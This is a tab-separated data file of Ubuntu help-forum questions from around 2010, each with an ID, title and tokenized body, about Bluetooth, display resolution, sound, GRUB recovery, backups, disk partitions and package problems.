5310	how to detect bluetooth , without rebooting	i have an external bluetooth adapter , it works if i attach it before booting , but if i connect it afterwards it fails to detect any device . is there any command to scan for and detect devices ?
5311	looking for a multi-monitor wallpaper switcher	i 've been looking without much success for a good linux multi monitor wallpaper switcher . ( does n't mean my search technique is n't fundamentally flawed ) regardless , would appreciate any suggestions/referrals . to provide some additional perspective , i 'm mainly looking for the linux equivalent of john 's background switcher .
5313	how to make a single program span two monitors when in twinview	i 'm trying to make emacs span two screens but the size is automatically resized to a single screen . i 'm running a nvidia card in twinview , with ubuntu 10.04 . i 'm having this problem with other programs also .
5314	where is /etc/x11/xorg.conf ?	where is the xorg.conf file in ubuntu 10.04 ? i could n't find it in /etc/x11/xorg.conf
5319	problem changing resolution using xrandr : badmatch	i tried to change the resolution using the following commands ( found here ) : use xrandr to check the current configuration and available modes : $ xrandr screen 0 : minimum 64 x 64 , current 800 x 600 , maximum 32000 x 32000 vbox1 connected 800x600+0+0 0mm x 0mm 800x600 60.0*+ 640x480 59.9 use cvt to get the proper modeline for 1280x800 : $ cvt 1280 800 # 1280x800 59.81 hz ( cvt 1.02ma ) hsync : 49.70 khz ; pclk : 83.50 mhz modeline `` 1280x800_60.00 '' 83.50 1280 1352 1480 1680 800 803 809 831 -hsync +vsync create the new mode using xrandr -- newmode : $ xrandr -- newmode `` 1280x800_60.00 '' 83.50 1280 1352 1480 1680 800 803 809 831 -hsync +vsync use xrandr again to check that the mode was created successfully : $ xrandr screen 0 : minimum 64 x 64 , current 800 x 600 , maximum 32000 x 32000 vbox1 connected 800x600+0+0 0mm x 0mm 800x600 60.0*+ 640x480 59.9 1280x800_60.00 ( 0x11a ) 83.0mhz h : width 1280 start 1352 end 1480 total 1680 skew 0 clock 49.4khz v : height 800 start 803 end 809 total 831 clock 59.5hz however , when i try to add the new mode to the display with xrandr -- addmode i get the following error : $ xrandr -- addmode vbox1 1280x800_60.00 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 150 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 18 current serial number in output stream : 19 of course , if i try to set the new resolution for my current display it fails ( the mode is n't associated to te display ) : $ xrandr -- output vbox1 -- mode 1280x800_60.00 xrandr : can not find mode 1280x800_60.00
5320	tab completion for commands	i 've noticed on the desktop version when typing commands like sudo apt-get install mysq i can tab complete like when resolving file paths . however in the server edition this does not happen . is there a package i need for this , or a configuration file to make this happen ?
5322	installing libapache2-mod-python removes cacti	i 'm trying to install django on a machine that is primarily a network administration box ; it has nagios and cacti installed on it . i went in today to install django , and when i followed the following instruction i got weird results : sudo apt-get install apache2 libapache2-mod-python told me it was freeing 77 mb worth of files . i should have taken more notice and stopped , but i assumed if apt-get wanted to do it , that it was probably ok . the next thing i see however is an ncurses based app explaining that we were now removing cacti . i hit ctrl-z , as i do n't want to remove cacti . now my system seems to be in a bit of a weird state ( though cacti is still ok ) . for example : me @ mysystem : ~ $ sudo dpkg -l|grep -v `` ii '' desired=unknown/install/remove/purge/hold | status=not/inst/cfg-files/unpacked/failed-cfg/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-===============================-===============================-============================================ rf cacti 0.8.7e-2 frontend to rrdtool for monitoring systems a rc cacti-spine 0.8.7e-2build1 multi-threading poller for cacti rc libgd2-noxpm 2.0.36~rc1~dfsg-3.1ubuntu1 gd graphics library version 2 ( without xpm s also , i 'm seeing lots of these errors now ( as expected , i suppose ) : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? what 's my best next step ? i do n't want to lose my cacti config for sure . what 's the best way to go about cleaning up this system ?
5324	what is a good pixel ruler ?	i 'm looking for something to easily measure the height/width of items on screen in pixels .
5325	why do i have no sound anymore ?	i hope this question is appropriate for this forum . i have an embarrassing problem . after trying to get ekiga-softfon running i suddenly have no sound anymore at all . but i ca n't tell how i caused this problem anymore . below i have collected some relevant information : lsb_release -d description : ubuntu 10.04.1 lts uname -r 2.6.32-25-generic cat /proc/asound/cards 0 [ ich6 ] : ich4 - intel ich6 intel ich6 with stac9752,53 at irq 16 aplay -l **** liste der hardware-geräte ( playback ) **** karte 0 : ich6 [ intel ich6 ] , gerät 0 : intel ich [ intel ich6 ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 0 : ich6 [ intel ich6 ] , gerät 4 : intel ich - iec958 [ intel ich6 - iec958 ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 aplay /usr/share/sounds/alsa/noise.wav wiedergabe : wave '/usr/share/sounds/alsa/noise.wav ' : signed 16 bit little endian , rate : 48000 hz , mono lspci -nnk | grep -ia2 audio 00:1e.2 multimedia audio controller [ 0401 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) ac'97 audio controller [ 8086:266e ] ( rev 03 ) kernel driver in use : intel ich kernel modules : snd-intel8x0 ps -c esd pid tty time cmd ps -c arts pid tty time cmd ps -c pulseaudio pid tty time cmd 1239 ? 00:00:00 pulseaudio grep `` ^audio '' /etc/group | grep `` $ user '' | wc -l 1 lsmod | grep `` snd '' snd_intel8x0 25588 1 snd_ac97_codec 100646 1 snd_intel8x0 ac97_bus 1002 1 snd_ac97_codec snd_pcm_oss 35308 0 snd_mixer_oss 13746 1 snd_pcm_oss snd_pcm 70694 3 snd_intel8x0 , snd_ac97_codec , snd_pcm_oss snd_seq_dummy 1338 0 snd_seq_oss 26726 0 snd_seq_midi 4557 0 snd_rawmidi 19056 1 snd_seq_midi snd_seq_midi_event 6003 2 snd_seq_oss , snd_seq_midi snd_seq 47263 6 snd_seq_dummy , snd_seq_oss , snd_seq_midi , snd_seq_midi_event snd_timer 19098 2 snd_pcm , snd_seq snd_seq_device 5700 5 snd_seq_dummy , snd_seq_oss , snd_seq_midi , snd_rawmidi , snd_seq snd 54148 12 snd_intel8x0 , snd_ac97_codec , snd_pcm_oss , snd_mixer_oss , snd_pcm , snd_seq_oss , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 6620 1 snd snd_page_alloc 7076 2 snd_intel8x0 , snd_pcm head -n 3 /proc/asound/card0/codec # 0 head : „/proc/asound/card0/codec # 0“ kann nicht zum lesen geöffnet werden : no such file or directory head -n 3 /proc/asound/card0/codec97 # 0/ac97 # 0-0 0-0/0 : sigmatel stac9752,53 pci subsys vendor : 0x1028 head -n 3 /proc/asound/card0/codec97 # 0/ac97 # 0-0+regs 0:00 = 6a90 0:02 = 0000 0:04 = 0000 asoundconf list asoundconf : befehl nicht gefunden cat ~/.asoundrc pcm.pulse { type pulse } ctl.pulse { type pulse } cat ~/.asoundrc.asoundconf cat : /home/rasmus/.asoundrc.asoundconf : no such file or directory there are some bits of german : `` befehl nicht gefunden '' means `` command not found '' , `` kann nicht zum lesen geöffnet werden '' means `` can not be opened for reading '' . i 'd appreciate any help .
5331	how to automate updates ?	my aunt and uncle asked me to setup a ubuntu machine for them , but here 's the problem ; they live 200 miles away , and are very computer illiterate . so , my question is ; how do i set the update system to be fully automatic ? ( ie : download and install the updates by itself ) i know it 's bad practice , but the altnertive is a diffrent distro or a lot of phone calls and fuel usage : /
5335	why is there 4.86 ( maybe 15.1 ) gb of used-space on a newly partitioned and formatted 298 gb drive ( as ext4 by gparted )	well the question says most of it ... gparted reports the used space as 4.86 gb nautilus reports used space as 15.1 gb ... ( via properties of /media/u_0298_data ) why is this space used ? and who is reporting the correct figure ? ( ... if either ) is this related to the trash ? ps . it is the only partition , and is using the entire drive space .
5338	is there a keyboard command for 'show desktop ' ?	like windows , i want to hit super+d to jump to the desktop or minimize all windows . i do n't see command like that in keyboard shortcuts . any idea ?
5342	where is my `` gnome-panel '' ? it went walkabout when i moved it to the right ( auto-hide=on ) . i have n't seen it since !	i 've been experimenting with the general layout of the desktop , and all was well until i moved the panel to the right-hand side of the screen . auto-hide was on at the time . i 've moved it several times before , without a hitch . the only thing different this time was that i had skype running in desktop-share mode , and it had a thin red line ( pun unintended , but it fits ) around the screen 's perimeter . this line prohibited me getting the mouse close enough to the edge to auto-show the panel . i stopped skype , and was able to display the panel normally again . i did the same thing again , but this time it did n't reappear , and is now definitely awol ( after rebooting ) . the least i would like from this is to retreive the layout and settings of the applets . getting the panel back would be even better . thanks for any ideas on this isssue .
5344	how do i dual boot windows xp and ubuntu ?	i already have ubuntu installed on the machine and a spare ntfs partition .
5346	windows xp guest in vmware player 3 can not maximise player windows	setup : ubuntu 10.04 64bit with dual monitor setup ( 1 dvi and 1 vga ) i have a scenario where i am running a windows xp guest in vmware player 3 . if i try and maximize the vmware player window it maximizes and starts jumping between both monitors every few seconds . i end up having to drag the player window bigger manually to fill a monitor . how can i fix this ? cheers
5347	how can i get bug reporting help ?	often , i find issues with the internals of ubuntu and i do n't know how to effectively assign the bug to the right project/audience . take this bug for example , regarding multiple monitor support . i 'd like to file this bug against gnome , but i do n't know which of the many gnome projects apply here ( or is it actually a problem with x ? or gtk ? ) . i ca n't even search for gnome-related projects or packages , as launchpad complains : too many matches . please try to narrow your search . i 've tried asking on # ubuntu and # ubuntu+1 but received no help due to the very high amount of ongoing activity : irc just does n't scale . as a result i had to mark the bug generically against ubuntu and now it 's just one of a dozen emails that the poor souls subscribed to the project receive on a hourly basis . i doubt the bug will get any attention this way . how can i effectively target a bug with non-frontend components of ubuntu ? where can i get help with targeting such bugs ?
5348	i 've lost my mbr and now i ca n't boot	the other day i was doing my backups and i was looking for more space to store my videos . so i formatted one of my harddrives ( i have 4 not counting the external i was backing up to ) , but this harddrive turned out to be the wrong one . it had my win7 installation and my mbr on it . i figured , no big deal , i 'll just use my super grub disk to boot properly , only it could n't . for reasons unknown , even when i pointed it to the correct /boot partition , it could n't boot . it also listed my raid 1 array partitions as `` unknown '' . here 's my setup : sda : 250 gb total - 250 gb in an ntfs partition with win7 installed ( this is the one i formatted ) sdb : 850 gb total - 4 gb swap - 846 gb forms a raid array sdc : 850 gb total - 4 gb /boot - 846 gb forms second part of raid array sdd : 200 gb total - 200 gb ntfs partition with winxp installed ( this is the one i meant to format ) the raid array is an lvm separated into a / and a /home . neither are encrypted . i do n't remember the exact distribution . what can i do to recover my ubuntu installation and restore grub to the mbr ? my /boot/grub/grub.cfg # # do not edit this file # # it is automatically generated by /usr/sbin/grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then load_env fi set default= '' 0 '' if [ $ { prev_saved_entry } ] ; then set saved_entry= $ { prev_saved_entry } save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z $ { boot_once } ] ; then saved_entry= $ { chosen } save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n $ { have_grubenv } ] ; then if [ -z $ { boot_once } ] ; then save_env recordfail ; fi ; fi } insmod raid insmod mdraid insmod lvm insmod ext2 set root= ' ( main-root ) ' search -- no-floppy -- fs-uuid -- set 12dbe5ea-5a53-4928-bf91-23697c1bcba0 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=640x480 insmod gfxterm insmod vbe if terminal_output gfxterm ; then true ; else # for backward compatibility with versions of terminal.mod that don't # understand terminal_output terminal gfxterm fi fi insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d set locale_dir= ( $ root ) /grub/locale set lang=en insmod gettext if [ $ { recordfail } = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , with linux 2.6.32-25-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d linux /vmlinuz-2.6.32-25-generic root=/dev/mapper/main-root ro quiet splash initrd /initrd.img-2.6.32-25-generic } menuentry 'ubuntu , with linux 2.6.32-25-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d echo 'loading linux 2.6.32-25-generic ... ' linux /vmlinuz-2.6.32-25-generic root=/dev/mapper/main-root ro single echo 'loading initial ramdisk ... ' initrd /initrd.img-2.6.32-25-generic } menuentry 'ubuntu , with linux 2.6.32-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d linux /vmlinuz-2.6.32-24-generic root=/dev/mapper/main-root ro quiet splash initrd /initrd.img-2.6.32-24-generic } menuentry 'ubuntu , with linux 2.6.32-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d echo 'loading linux 2.6.32-24-generic ... ' linux /vmlinuz-2.6.32-24-generic root=/dev/mapper/main-root ro single echo 'loading initial ramdisk ... ' initrd /initrd.img-2.6.32-24-generic } menuentry 'ubuntu , with linux 2.6.32-23-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d linux /vmlinuz-2.6.32-23-generic root=/dev/mapper/main-root ro quiet splash initrd /initrd.img-2.6.32-23-generic } menuentry 'ubuntu , with linux 2.6.32-23-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d echo 'loading linux 2.6.32-23-generic ... ' linux /vmlinuz-2.6.32-23-generic root=/dev/mapper/main-root ro single echo 'loading initial ramdisk ... ' initrd /initrd.img-2.6.32-23-generic } menuentry 'ubuntu , with linux 2.6.32-22-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d linux /vmlinuz-2.6.32-22-generic root=/dev/mapper/main-root ro quiet splash initrd /initrd.img-2.6.32-22-generic } menuentry 'ubuntu , with linux 2.6.32-22-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d echo 'loading linux 2.6.32-22-generic ... ' linux /vmlinuz-2.6.32-22-generic root=/dev/mapper/main-root ro single echo 'loading initial ramdisk ... ' initrd /initrd.img-2.6.32-22-generic } menuentry 'ubuntu , with linux 2.6.31-14-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d linux /vmlinuz-2.6.31-14-generic root=/dev/mapper/main-root ro quiet splash initrd /initrd.img-2.6.31-14-generic } menuentry 'ubuntu , with linux 2.6.31-14-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d echo 'loading linux 2.6.31-14-generic ... ' linux /vmlinuz-2.6.31-14-generic root=/dev/mapper/main-root ro single echo 'loading initial ramdisk ... ' initrd /initrd.img-2.6.31-14-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d linux16 /memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod ext2 set root= ' ( hd3,1 ) ' search -- no-floppy -- fs-uuid -- set f1284e5e-f162-4964-b904-f05f47f6325d linux16 /memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows xp ultimate ( on /dev/sdb1 ) '' { insmod ntfs set root= ' ( hd1,1 ) ' search -- no-floppy -- fs-uuid -- set 1a440692440670b5 drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry `` windows 7 ( loader ) ( on /dev/sdc1 ) '' { insmod ntfs set root= ' ( hd2,1 ) ' search -- no-floppy -- fs-uuid -- set 5816f15316f1331c chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # #
5358	configure application priority to access the network	i noticed that when i am running applications such bittorrent all the other applications have trouble accessing the network . i am sure it would be possible to limit bittorrent 's network usage but what i really want is to be able to set priorities to applications ( or protocols ) accessing the network . for example , let 's say i put max priority for the browser ( or http ) and then , no matter how much bandwidth was using at the time , the http packets would always go through . is this possible ? is there an application for ubuntu to do this or a way to configure this on ubuntu directly ?
5363	how to start a terminal with certain text already input on the command-line ?	rather than rephrasing my question , let me describe to you the desired user-case : i create a short shell-script to run command `` gnome-terminal -- someoptionflagname 'my text to be posted ' '' , and execute this script . gnome-terminal pops up , with command-line prompt followed by my text . ie : fields @ mycomputer : / $ my text to be posted can this be done ?
5369	why ca n't rhythmbox/coherence see ps3 media server ?	by ps3 media server , i mean the package , rather than an actual ps3 . it 's a upnp server . my xbox can see it and stream from it , but the coherence plug-in of rhythmbox does not seem to be able to . i suspect it may need a new renderer configuration . has anyone run into this problem and resolved it ? i also had the same problem with x360mediaserver , a similar server side package .
5373	swf file as screensaver	i 'd like to use an swf file as screensaver . from xscreensaver faq : to play swf flash animations : macromedia 's stand-alone flash player has xscreensaver support , as of version 6.0.79 and later . to use it , put a line like this in the `programs ' preference in your .xscreensaver file : '' my flash '' gflashplayer -root $ home/movies/my_flash.swf \n\ every version of the standalone flashplayer i found has no -root option and i ca n't find gflashplayer . also gnash -x $ xscreensaver_window does n't seem to work .
5374	how to enable compcache ?	compcache is a form of compressed ram swap that should improve performance in some circumstances for memory starved machines . http : //code.google.com/p/compcache/ apparently ubuntu has had this available for a bit now , and i attempted to enable it , and found this post : http : //ubuntuforums.org/showpost.php ? p=6609064 & postcount=10 what other steps do i have to take to enable compcache on ubuntu , or is that it ?
5377	why is libatlas so old ?	the version of libatlas avail . on debian and/or fedora are much more up to date ( as in more than a year if not two ) than those i see on the ubuntu reps. why that is ? is it possible ( advised ? ) to bypass the ubuntu reps and use the packages from the debian reps ( and run unto dependency hell ) ? or is there a fundamental reasons why libatlas is stuck at 3.6.x in ubuntu ?
5379	main menu keyboard navigation does not restart at the first typed letter . is this a bug or a tweakable feature ?	skip this section , unless you want to read some really boring background . i often prefer to navigate via the keyboard , and i typically launch my most frequently used apps via a system-wide hot-key . for less frequtnely used ones i had developed my own quirky menu-navigation system ( in windows , where i 've spent the last 20 years ) . it relies on the principle of `` jump to the next item in the list which matches the letter/character i 've just typed '' ... i am only referring to first-letter/character . i created a folder called ` ( ie . a single back-tick ) in this folder was a simple list of my `` secondary '' apps ... with one minor difference . each of these was prefixed with with either ` , ~ , or ! all these keys are conveniently located near the menu-launch key ( win-key , or alt-f1 ) ... i have my main menu popping up ( like windows ) this enables me to start any of my secondary apps with a simple consistancy ; even blindfolded . aside from a minor difference in how ubuntu/ ( gnome ) submenus must be specifically naviated into ( ... wheras windows automatically moves the focus into the sub-menu ) ... i have this same system working in ubuntu . i love the way ubuntu ( linux ) is so configurable ! but ! ( such a small word ) ... there is a problem . for some unknown reason , the `` jump to next item starting with **letter/character** '' feature behaves oddly in the gnome menu . is it a bug , is it a feature , is it tweakable ? ... . i do n't know , but this is how it ( mis- ) behaves : it remembers the most recently accessed item of a letter/character group.. even across seperate open/close cycles of the menu ... this beaks the do-it-blindfolded consistancy which is why i use this first-letter method . does anyone know if this is tweakable ? so that each new access to a menu-list causes the `` first-item '' to be the topmost item ( within that first letter/character group ) , and not the next one on from a previous menu session ...
5380	how to restart java/flash from command line ?	the java/flash plugin support in the browsers seems a little iffy ( not to mention hard to configure . ) my specific question is , is it possible to kill the flash/java pid and restart the process ? anyone know how to id these plugin processes ? i 've closed out the browser and reopened , it does n't seem to die with them . is flash persistent ?
5394	postgresql missing /etc/postgresql folder ?	i have a fresh installation of ubuntu 10.10 ( amd64 ) . even though the postgresql ( 8.4.5 ) server and client are installed , the postgresql directory in /etc folder is missing . any clues what could be cause of this problem .
5396	future of bazaar	the bazaar dvcs seems to be left far behind git and mercurial , at least in terms of adoption and overall mindshare in the vcs space . afaik the only high profile projects using bzr are ubuntu and launchpad , both directly backed by canonical . so i 'm wondering , would it make sense for canonical to switch to one of the other two leading contenders instead of keep allocating resources to it ? is there any strategic advantage , technical or otherwise , in pushing bazaar at this time and age ?
5397	webcam not recognized in dell mini 10v on lucid lynx . how to troubleshoot ?	hi , basically i have installed ubuntu netbook ( 10.04 ) on my dell mini 10v ( inspiron 1011 ) and the webcam does not work . i tried with cheese and skype and they do n't see any webcam . i 've been searching in internet but it looks like no one is having problems with the webcam on ubuntu and therefore , i do n't find what i can do to fix the problem . i would appreciate if anyone could help me do it ! thanks edit : thanks for the comment , this is the otuput of lsusb , it seems it is not detected : s bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 046d : c526 logitech , inc. mx revolution cordless mouse bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 0bda:0158 realtek semiconductor corp. mass storage device bus 001 device 003 : id 174f:1403 syntek bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
5399	ubuntu and windows server 2008 nfs	background i am trying to configure nfs on my windows server 2008 with unix extensions to be able to connect to ubuntu . however in 2008 you need ad to activate user profile mappings . windows can however connect to a identity manager service to retrieve this information from another machine . the reason for not running ad is that the server and setup is on a home network , and therefore ad is completely unnecessary . the question how and can i configure my ubuntu machine to provide a user profile mapping service , and what/how would i go about setting it up on my ubuntu machine ? i need to be able to map my windows users to my linux users without require ad . the problem with using openldap is that it does n't support server 2008 and also i am not sharing anything from ubuntu . also nfs can see the shares on the server however ca n't connect to them in anyway . current setup i am running ubuntu 10.10 without any gui . it is a headless installation mainly used to run service type software and to do some network monitoring . it does not have any shares on the box , however connects to shares on the windows server 2008 machine using cifs and fstab mounts . however i would like to switch to nfs because symlinks wo n't work when running rsync to backup the ubuntu box for example .
5401	which tool to backup an ext4 partition ?	i 'm searching for a tool to backup a whole ext4 partition to an image . i tried the latest version of mondo , which is not working . what are good alternatives ?
5403	how do i install nautilus-elementary ?	i 've added the am-monkeyd ppa and upgraded my system . yet , there 's no sign of elementary in my fresh maverick rc install . have i done anything wrong ? the ppa upgrades the default nautilus package and there is no separate `` nautilus-elementary '' package as of now . now , there are three versions listed in the package properties : 1:2.32.0-0ubuntu1-ppa1 ( maverick ) ; 1:2.32.0-0ubuntu5~ppa5 ( maverick ) ; 1:2.32.0-0ubuntu1 ( maverick ) ; anything you can make out from this ?
5410	how to run an application as another user ?	i use krusader for file management stuff . the problem is that apache 's documentroot should be under chown www-data : www-data /path/to/www . so using krusader ( which is run under my account ) i 've not write access to /path/to/www while i really need . i do n't know how other developers can continue doing things with such a restriction ! i wondered if i could run krusader as www-data then i will be able to easily play with files . but using su - www-data asked me for www-data 's password ! ! so , how can i run an application ( like krusader ) as another user ( like www-data ) in gnome ? or is there any other solution for my case ? ( tough i 'm really curious to know the answer ! ) keep in mind that i know i can run it as root ! but this will cause some permission problems when using cp and mkdir , you know . ps : sudo and gksudo did not help : $ gksudo -u -www-data krusader no protocol specified krusader : can not connect to x server :0.0 final note : according the best answer , i did chmod u+w /path/to/www and my problem solved . but i still has not been succeeded in opening krusader as another user !
5416	how do i install kernel 2.6.35 in 10.04 ?	i have encountered a bug relating to stock kernel 2.6.32 in lucid , so i want to upgrade to 2.6.35 . what is the simplest way of doing that ?
5417	how to get gpu info ?	i 'm looking for a command that would give me the same info as cat /proc/cpuinfo except for the gpu ( type of the chip and memory , frequency )
5418	change login screen with gksudo -u gdm ... does not work	i try to change the appearance of the login screen in ubuntu 10.10 with gksudo -u gdm dbus-launch gnome-appearance-properties but it does n't work . i get the following error . ( gnome-appearance-properties:3624 ) : gtk-warning ** : can not open display : :0.0 no protocol specified anzeige kann nicht geรถffnet werden : what 's the reason ?
5423	unable to activate the desktop art plug-in for rhythmbox	i 've neither installed , nor upgraded , any packages for a couple of days , yet today rhythmbox is reporting that it was 'unable to activate plugin desktop art . ' it worked before i left the computer ( at around 03:00 ) , but when i restarted this afternoon it either could n't or would n't . i presume could n't , i do n't think my box actively resists my expectations . while i understand there could , potentially , be any number of reasons for this , i was wondering if there 's a way to find out why it ca n't be activated ? or , of course , if anyone knows of a workaround to re-enable one of the few plug-ins i find to be essential . possibly this might be fixed by simply upgrading to ubuntu 10.10 , but i 'd rather know what 's happening now , than ignoring it and praying . the only dependencies i could find are the following : python 2.5 ( or higher ) , currently i have : 2.6.5 , gnome-python-desktop , currently locating this package in synaptic .
5425	what am i missing to get symlinks to work with cifs ?	scenario i have a headless ubuntu 10.10 rc box running a few service applications on my home network . i have a windows 2008 server hosting all my network shares and hard drives . i am currently mounting the network drives at boot-up using fstab with the following options set : credentails=/etc/smbcredentials , iocharset=utf8 , uid=1000 , gid=1000 , file_mode=0777 , dir_mode=0777 , noserverino , sfu question what option do i need to set to get symlinks to properly register using cifs ? i have to admit the info in man mount.cifs does n't seem to provide a clear enough definition of which options i should be using for proper support . problem when running rsync from the ubuntu machine to back up selected folders to the windows shares , it fails trying to recreate the symlinks . i am concerned that this will create a problem when later trying to restore these files back should i ever need to .
5431	how can i email an attachment from the command line	is it possible to email attachments from the command line ? if possible , i 'd like something as simple as : mail -a myfile.txt -t me @ example.com -s `` here 's my file ''
5432	using tar for simple back-up and restore	i want to back up a user 's home folder by making the entire content into an archive document and storing it on an external ext3 ( or ext4 ? ) hard drive . i 'll want to keep all the file attributes . is this a good command ? any particular advice ? does line 4 has any redundancies ? 1 sudo tar -czvf 2 /media/ext_drive/back_jimmy_2010_10_09.tgz 3 /home/jimmy 4 -- atime-preserve -- same-owner -- preserve-permissions 5 -- exclude='.beagle ' -- exclude='.gvfs' even more importantly , i want your instructions for using the tar command to restore .
5433	when will ubuntu 10.10 be released ?	at what time will be ubuntu 10.10 will be released , in ust or ist ?
5435	will there be data loss for upgrade ?	i am planning to upgrade from 8.10 to 10.04 . but i am wondering if there will be data loss during the upgrade ? for example : will the application that i have installed on 8.10 still be there after upgrade ? will the settings of the applications such as the bookmarks for firefox and for google chrome be preserved ? will all the personal files under my home directory be preserved ? any other things i need to know for the upgrade ? thanks and regards !
5437	how to change timezone ?	i 've installed ubuntu in my laptop while i was travelling in other country . when i was back , i tried to change my time zone back , but every time i restart the computer , the time zone goes back to the one of the country where i installed ubuntu .
5440	installing packages in multiple systems	i have to install some packages in 5 ubuntu system in my office . there , bandwidth is limited . so , is there any way to install it in one system & copy to other , so that all works fine ? all systems are fresh install .
5444	how to find out how much disk space is remaining ?	what is the command to find out how much disk space is being used/remaining ?
5458	how can i easily remaster ubuntu ?	i 'm planning to run an ubuntu event in my office in which i have to distribute a modified version of ubuntu which contains all the multimedia content & some specific packages from repositories . how can do it easily ? i have a working fresh installation of ubuntu in my personal computer .
5459	how can i install the latest version of sun java ( jre ) ?	is there a reliable method to install the current version of sun java ? update 18 is in the repos , but it looks like sun is up to update 21 ? i have n't yet found what i would consider to be reliable instructions that make much sense to the layman .
5466	is a clean install better than upgrading ?	is it better to install ubuntu completely new or is the upgrade process just as good ? in other words , will my computer run just as problem-free and efficiently when i upgrade as opposed to a fresh install ?
5470	how to setup delay for indicator-applet ?	time , when notification is shown is too much . how can i cut it ?
5474	how to move from mint 9 to ubuntu 10.10 ?	i have a mint 9 & windows 7 laptop , that i , obviously , want to upgrade to ubuntu 10.10 . i do want to keep the dual boot , and i do not want to keep the mint . i have burg controlling the boot - will that cause any problems with ubuntu installation/upgrade ?
5482	how can i format my drive to have multiple partitions ?	can i make a home partition on my drive and move my home folder there without reformatting my entire disk ? i am booting my system off a usb stick and running gparted . i can change the size of the partition and add another but i do n't know how to set the file structure to recognize it as home .
5483	distorted sounds in pidgin	after upgrade to 10.10 pidgin sounds became annoyingly distorted so i had to turn them of . any ideas on how to fix ?
5484	how can i move my /home directory to another partition if it 's already part of the / partition ?	i have a wonderful running maverick meerkat install going on right now . i want to move my /home to another partition as per many suggestions . how can i go about doing this without reinstalling the entire ubuntu system ? can i simply create the partition with gparted and then change the mount point of /home in fstab to reflect it or is it a bit more difficult ?
5486	how should i troubleshoot skipping audio ?	i 'm still at the `` figure out what the problem even is '' stage of troubleshooting . the symptom : amarok is skipping every few minutes in an up-to-date installation of ubuntu 10.10 . what i 've checked so far : movie player ( totem ) does not skip when playing the same files . the skips do not correlate with increased cpu , memory , disk , or network usage . amarok -- debug does not output anything when a skip occurs . where should one look to troubleshoot skipping audio ?
